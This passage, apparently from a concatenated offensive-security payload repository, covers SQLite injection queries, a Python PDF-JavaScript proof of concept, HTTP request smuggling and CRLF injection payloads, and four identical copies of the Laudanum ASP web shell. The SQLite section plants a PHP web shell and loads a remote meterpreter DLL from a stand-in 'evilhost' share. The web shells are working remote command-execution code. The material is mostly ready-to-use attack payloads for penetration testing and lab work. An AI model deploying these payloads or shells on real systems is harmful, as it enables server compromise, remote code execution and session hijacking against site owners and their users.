table name 30 | 31 | ```sql 32 | SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' 33 | ``` 34 | 35 | Use limit X+1 offset X, to extract all tables. 36 | 37 | ## Integer/String based - Extract column name 38 | 39 | ```sql 40 | SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' 41 | ``` 42 | 43 | For a clean output 44 | 45 | ```sql 46 | SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name' 47 | ``` 48 | 49 | ## Boolean - Count number of tables 50 | 51 | ```sql 52 | and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table 53 | ``` 54 | 55 | ## Boolean - Enumerating table name 56 | 57 | ```sql 58 | and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number 59 | ``` 60 | 61 | ## Boolean - Extract info 62 | 63 | ```sql 64 | and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char') 65 | ``` 66 | 67 | ## Time based 68 | 69 | ```sql 70 | AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) 71 | ``` 72 | 73 | ## Remote Command Execution using SQLite command - Attach Database 74 | 75 | ```sql 76 | ATTACH DATABASE '/var/www/lol.php' AS lol; 77 | CREATE TABLE lol.pwn (dataz text); 78 | INSERT INTO lol.pwn (dataz) VALUES ('<?system($_GET['cmd']); ?>');-- 79 | ``` 80 | 81 | ## Remote Command Execution using SQLite command - Load_extension 82 | 83 | ```sql 84 | UNION SELECT 
1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 85 | ``` 86 | 87 | Note: By default this component is disabled 88 | 89 | ## References 90 | 91 | [Injecting SQLite database based application - Manish Kishan Tanwar](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf) 92 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension PDF JS/poc.py: -------------------------------------------------------------------------------- 1 | # FROM https://github.com/osnr/horrifying-pdf-experiments 2 | import sys 3 | 4 | from pdfrw import PdfWriter 5 | from pdfrw.objects.pdfname import PdfName 6 | from pdfrw.objects.pdfstring import PdfString 7 | from pdfrw.objects.pdfdict import PdfDict 8 | from pdfrw.objects.pdfarray import PdfArray 9 | 10 | def make_js_action(js): 11 | action = PdfDict() 12 | action.S = PdfName.JavaScript 13 | action.JS = js 14 | return action 15 | 16 | def make_field(name, x, y, width, height, r, g, b, value=""): 17 | annot = PdfDict() 18 | annot.Type = PdfName.Annot 19 | annot.Subtype = PdfName.Widget 20 | annot.FT = PdfName.Tx 21 | annot.Ff = 2 22 | annot.Rect = PdfArray([x, y, x + width, y + height]) 23 | annot.MaxLen = 160 24 | annot.T = PdfString.encode(name) 25 | annot.V = PdfString.encode(value) 26 | 27 | # Default appearance stream: can be arbitrary PDF XObject or 28 | # something. Very general. 29 | annot.AP = PdfDict() 30 | 31 | ap = annot.AP.N = PdfDict() 32 | ap.Type = PdfName.XObject 33 | ap.Subtype = PdfName.Form 34 | ap.FormType = 1 35 | ap.BBox = PdfArray([0, 0, width, height]) 36 | ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0]) 37 | ap.stream = """ 38 | %f %f %f rg 39 | 0.0 0.0 %f %f re f 40 | """ % (r, g, b, width, height) 41 | 42 | # It took me a while to figure this out. 
See PDF spec: 43 | # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641 44 | 45 | # Basically, the appearance stream we just specified doesn't 46 | # follow the field rect if it gets changed in JS (at least not in 47 | # Chrome). 48 | 49 | # But this simple MK field here, with border/color 50 | # characteristics, _does_ follow those movements and resizes, so 51 | # we can get moving colored rectangles this way. 52 | annot.MK = PdfDict() 53 | annot.MK.BG = PdfArray([r, g, b]) 54 | 55 | return annot 56 | 57 | def make_page(fields, script): 58 | page = PdfDict() 59 | page.Type = PdfName.Page 60 | 61 | page.Resources = PdfDict() 62 | page.Resources.Font = PdfDict() 63 | page.Resources.Font.F1 = PdfDict() 64 | page.Resources.Font.F1.Type = PdfName.Font 65 | page.Resources.Font.F1.Subtype = PdfName.Type1 66 | page.Resources.Font.F1.BaseFont = PdfName.Helvetica 67 | 68 | page.MediaBox = PdfArray([0, 0, 612, 792]) 69 | 70 | page.Contents = PdfDict() 71 | page.Contents.stream = """ 72 | BT 73 | /F1 24 Tf 74 | ET 75 | """ 76 | 77 | annots = fields 78 | 79 | page.AA = PdfDict() 80 | # You probably should just wrap each JS action with a try/catch, 81 | # because Chrome does no error reporting or even logging otherwise; 82 | # you just get a silent failure. 
83 | page.AA.O = make_js_action(""" 84 | try { 85 | %s 86 | } catch (e) { 87 | app.alert(e.message); 88 | } 89 | """ % (script)) 90 | 91 | page.Annots = PdfArray(annots) 92 | return page 93 | 94 | if len(sys.argv) > 1: 95 | js_file = open(sys.argv[1], 'r') 96 | 97 | fields = [] 98 | for line in js_file: 99 | if not line.startswith('/// '): break 100 | pieces = line.split() 101 | params = [pieces[1]] + [float(token) for token in pieces[2:]] 102 | fields.append(make_field(*params)) 103 | 104 | js_file.seek(0) 105 | 106 | out = PdfWriter() 107 | out.addpage(make_page(fields, js_file.read())) 108 | out.write('result.pdf') -------------------------------------------------------------------------------- /Request Smuggling/README.md: -------------------------------------------------------------------------------- 1 | # Request Smuggling 2 | 3 | ## Summary 4 | 5 | * [Tools](#tools) 6 | * [CL.TE vulnerabilities](#cl.te-vulnerabilities) 7 | * [TE.CL vulnerabilities](#te.cl-vulnerabilities) 8 | * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) 9 | * [References](#references) 10 | 11 | ## Tools 12 | 13 | * [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) 14 | * [Smuggler](https://github.com/defparam/smuggler) 15 | 16 | ## CL.TE vulnerabilities 17 | 18 | > The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header. 
19 | 20 | ```powershell 21 | POST / HTTP/1.1 22 | Host: vulnerable-website.com 23 | Content-Length: 13 24 | Transfer-Encoding: chunked 25 | 26 | 0 27 | 28 | SMUGGLED 29 | ``` 30 | 31 | Example: 32 | 33 | ```powershell 34 | POST / HTTP/1.1 35 | Host: domain.example.com 36 | Connection: keep-alive 37 | Content-Type: application/x-www-form-urlencoded 38 | Content-Length: 6 39 | Transfer-Encoding: chunked 40 | 41 | 0 42 | 43 | G 44 | ``` 45 | 46 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te 47 | 48 | ## TE.CL vulnerabilities 49 | 50 | > The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header. 51 | 52 | ```powershell 53 | POST / HTTP/1.1 54 | Host: vulnerable-website.com 55 | Content-Length: 3 56 | Transfer-Encoding: chunked 57 | 58 | 8 59 | SMUGGLED 60 | 0 61 | ``` 62 | 63 | Example: 64 | 65 | ```powershell 66 | POST / HTTP/1.1 67 | Host: domain.example.com 68 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 69 | Content-Length: 4 70 | Connection: close 71 | Content-Type: application/x-www-form-urlencoded 72 | Accept-Encoding: gzip, deflate 73 | 74 | 5c 75 | GPOST / HTTP/1.1 76 | Content-Type: application/x-www-form-urlencoded 77 | Content-Length: 15 78 | x=1 79 | 0 80 | 81 | 82 | ``` 83 | 84 | :warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence \r\n\r\n following the final 0. 85 | 86 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl 87 | 88 | ## TE.TE behavior: obfuscating the TE header 89 | 90 | > The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way. 
91 | 92 | ```powershell 93 | Transfer-Encoding: xchunked 94 | Transfer-Encoding : chunked 95 | Transfer-Encoding: chunked 96 | Transfer-Encoding: x 97 | Transfer-Encoding:[tab]chunked 98 | [space]Transfer-Encoding: chunked 99 | X: X[\n]Transfer-Encoding: chunked 100 | Transfer-Encoding 101 | : chunked 102 | ``` 103 | 104 | Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header 105 | 106 | ## References 107 | 108 | * [PortSwigger - Request Smuggling Tutorial](https://portswigger.net/web-security/request-smuggling) and [PortSwigger - Request Smuggling Reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 109 | * [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0) 110 | -------------------------------------------------------------------------------- /CRLF Injection/README.md: -------------------------------------------------------------------------------- 1 | # CRLF 2 | 3 | >The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They mark the end of a line, but today's popular operating systems handle them differently. For example: in Windows both a CR and an LF are required to mark the end of a line, whereas in Linux/UNIX only an LF is required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. 4 | 5 | >A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
6 | 7 | ## Summary 8 | 9 | - [CRLF - Add a cookie](#crlf---add-a-cookie) 10 | - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) 11 | - [CRLF - Write HTML](#crlf---write-html) 12 | - [CRLF - Filter Bypass](#crlf---filter-bypass) 13 | - [References](#references) 14 | 15 | ## CRLF - Add a cookie 16 | 17 | Requested page 18 | 19 | ```http 20 | http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue 21 | ``` 22 | 23 | HTTP Response 24 | 25 | ```http 26 | Connection: keep-alive 27 | Content-Length: 178 28 | Content-Type: text/html 29 | Date: Mon, 09 May 2016 14:47:29 GMT 30 | Location: https://www.example.net/[INJECTION STARTS HERE] 31 | Set-Cookie: mycookie=myvalue 32 | X-Frame-Options: SAMEORIGIN 33 | X-Sucuri-ID: 15016 34 | x-content-type-options: nosniff 35 | x-xss-protection: 1; mode=block 36 | ``` 37 | 38 | ## CRLF - Add a cookie - XSS Bypass 39 | 40 | Requested page 41 | 42 | ```powershell 43 | http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e 44 | ``` 45 | 46 | HTTP Response 47 | 48 | ```http 49 | HTTP/1.1 200 OK 50 | Date: Tue, 20 Dec 2016 14:34:03 GMT 51 | Content-Type: text/html; charset=utf-8 52 | Content-Length: 22907 53 | Connection: close 54 | X-Frame-Options: SAMEORIGIN 55 | Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT 56 | ETag: "842fe-597b-54415a5c97a80" 57 | Vary: Accept-Encoding 58 | X-UA-Compatible: IE=edge 59 | Server: NetDNA-cache/2.2 60 | Link: <https://example.com/[INJECTION STARTS HERE] 61 | Content-Length:35 62 | X-XSS-Protection:0 63 | 64 | 23 65 | <svg onload=alert(document.domain)> 66 | 0 67 | ``` 68 | 69 | ## CRLF - Write HTML 70 | 71 | Requested page 72 | 73 | ```http 74 | 
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E 75 | ``` 76 | 77 | HTTP response 78 | 79 | ```http 80 | Set-Cookie:en 81 | Content-Length: 0 82 | 83 | HTTP/1.1 200 OK 84 | Content-Type: text/html 85 | Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT 86 | Content-Length: 34 87 | 88 | <html>You have been Phished</html> 89 | ``` 90 | 91 | ## CRLF - Filter Bypass 92 | 93 | Using UTF-8 encoding 94 | 95 | ```http 96 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE 97 | ``` 98 | 99 | Remainder: 100 | 101 | * %E5%98%8A = %0A = \u560a 102 | * %E5%98%8D = %0D = \u560d 103 | * %E5%98%BE = %3E = \u563e (>) 104 | * %E5%98%BC = %3C = \u563c (<) 105 | 106 | 107 | ## Exploitation Tricks 108 | * Try to search for parameters that lead to redirects and fuzz them 109 | * Also test the mobile version of the website, sometimes it is different or uses a different backend 110 | 111 | ## References 112 | 113 | * https://www.owasp.org/index.php/CRLF_Injection 114 | * https://vulners.com/hackerone/H1:192749 115 | -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.asa: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson <kjohnson@secureideas.net 13 | ' *** Tim Medin 
<tim@securitywhole.com> 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood <Digininja> 20 | ' *** Updated and fixed by Tim Medin <tim@securitywhole.com 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 
37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | 41 | ' can set this to 0 for never time out but don't want to kill the server if a script 42 | ' goes into a loop for any reason 43 | Server.ScriptTimeout = 180 44 | 45 | ip=request.ServerVariables("REMOTE_ADDR") 46 | if ip<>"1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "<br />") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | <html> 67 | <head><title>Laundanum ASP Shell</title></head> 68 | <body onload="document.shell.cmd.focus()"> 69 | <form action="shell.asp" method="POST" name="shell"> 70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br /> 71 | <input type="submit" name="submit" value="Submit" /> 72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 | <p>Example command to do a directory listing:<br> 74 | %ComSpec% /c dir 75 | </form> 76 | <hr/> 77 | <address> 78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> 79 | Written by Tim Medin.<br/> 80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. 
81 | </address> 82 | </body> 83 | </html> -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson <kjohnson@secureideas.net 13 | ' *** Tim Medin <tim@securitywhole.com> 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood <Digininja> 20 | ' *** Updated and fixed by Tim Medin <tim@securitywhole.com 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 
37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | 41 | ' can set this to 0 for never time out but don't want to kill the server if a script 42 | ' goes into a loop for any reason 43 | Server.ScriptTimeout = 180 44 | 45 | ip=request.ServerVariables("REMOTE_ADDR") 46 | if ip<>"1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "<br />") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | <html> 67 | <head><title>Laundanum ASP Shell</title></head> 68 | <body onload="document.shell.cmd.focus()"> 69 | <form action="shell.asp" method="POST" name="shell"> 70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br /> 71 | <input type="submit" name="submit" value="Submit" /> 72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 | <p>Example command to do a directory listing:<br> 74 | %ComSpec% /c dir 75 | </form> 76 | <hr/> 77 | <address> 78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> 79 | Written by Tim Medin.<br/> 80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. 
81 | </address> 82 | </body> 83 | </html> -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.cer: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson <kjohnson@secureideas.net 13 | ' *** Tim Medin <tim@securitywhole.com> 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood <Digininja> 20 | ' *** Updated and fixed by Tim Medin <tim@securitywhole.com 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 
37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | 41 | ' can set this to 0 for never time out but don't want to kill the server if a script 42 | ' goes into a loop for any reason 43 | Server.ScriptTimeout = 180 44 | 45 | ip=request.ServerVariables("REMOTE_ADDR") 46 | if ip<>"1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "<br />") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | <html> 67 | <head><title>Laundanum ASP Shell</title></head> 68 | <body onload="document.shell.cmd.focus()"> 69 | <form action="shell.asp" method="POST" name="shell"> 70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br /> 71 | <input type="submit" name="submit" value="Submit" /> 72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 | <p>Example command to do a directory listing:<br> 74 | %ComSpec% /c dir 75 | </form> 76 | <hr/> 77 | <address> 78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> 79 | Written by Tim Medin.<br/> 80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. 
81 | </address> 82 | </body> 83 | </html> -------------------------------------------------------------------------------- /Upload Insecure Files/Extension ASP/shell.asmx: -------------------------------------------------------------------------------- 1 | <% 2 | ' ******************************************************************************* 3 | ' *** 4 | ' *** Laudanum Project 5 | ' *** A Collection of Injectable Files used during a Penetration Test 6 | ' *** 7 | ' *** More information is available at: 8 | ' *** http://laudanum.secureideas.net 9 | ' *** laudanum@secureideas.net 10 | ' *** 11 | ' *** Project Leads: 12 | ' *** Kevin Johnson <kjohnson@secureideas.net 13 | ' *** Tim Medin <tim@securitywhole.com> 14 | ' *** 15 | ' *** Copyright 2012 by Kevin Johnson and the Laudanum Team 16 | ' *** 17 | ' ******************************************************************************** 18 | ' *** 19 | ' *** Updated and fixed by Robin Wood <Digininja> 20 | ' *** Updated and fixed by Tim Medin <tim@securitywhole.com 21 | ' *** 22 | ' ******************************************************************************** 23 | ' *** This program is free software; you can redistribute it and/or 24 | ' *** modify it under the terms of the GNU General Public License 25 | ' *** as published by the Free Software Foundation; either version 2 26 | ' *** of the License, or (at your option) any later version. 27 | ' *** 28 | ' *** This program is distributed in the hope that it will be useful, 29 | ' *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | ' *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | ' *** GNU General Public License for more details. 32 | ' *** 33 | ' *** You can get a copy of the GNU General Public License from this 34 | ' *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | ' *** You can also write to the Free Software Foundation, Inc., Temple 36 | ' *** Place - Suite Boston, MA USA. 
37 | ' *** 38 | ' ***************************************************************************** */ 39 | 40 | 41 | ' can set this to 0 for never time out but don't want to kill the server if a script 42 | ' goes into a loop for any reason 43 | Server.ScriptTimeout = 180 44 | 45 | ip=request.ServerVariables("REMOTE_ADDR") 46 | if ip<>"1.2.3.4" then 47 | response.Status="404 Page Not Found" 48 | response.Write(response.Status) 49 | response.End 50 | end if 51 | 52 | if Request.Form("submit") <> "" then 53 | Dim wshell, intReturn, strPResult 54 | cmd = Request.Form("cmd") 55 | Response.Write ("Running command: " & cmd & "<br />") 56 | set wshell = CreateObject("WScript.Shell") 57 | Set objCmd = wShell.Exec(cmd) 58 | strPResult = objCmd.StdOut.Readall() 59 | 60 | response.write "<br><pre>" & replace(replace(strPResult,"<","&lt;"),vbCrLf,"<br>") & "</pre>" 61 | 62 | set wshell = nothing 63 | end if 64 | 65 | %> 66 | <html> 67 | <head><title>Laundanum ASP Shell</title></head> 68 | <body onload="document.shell.cmd.focus()"> 69 | <form action="shell.asp" method="POST" name="shell"> 70 | Command: <Input width="200" type="text" name="cmd" value="<%=cmd%>" /><br /> 71 | <input type="submit" name="submit" value="Submit" /> 72 | <p>Don't forget that if you want to shell command (not a specific executable) you need to call cmd.exe. It is usually located at C:\Windows\System32\cmd.exe, but to be safe just call %ComSpec%. Also, don't forget to use the /c switch so cmd.exe terminates when your command is done. 73 | <p>Example command to do a directory listing:<br> 74 | %ComSpec% /c dir 75 | </form> 76 | <hr/> 77 | <address> 78 | Copyright &copy; 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/> 79 | Written by Tim Medin.<br/> 80 | Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>. 
81 | </address> 82 | </body> 83 | </html> --------------------------------------------------------------------------------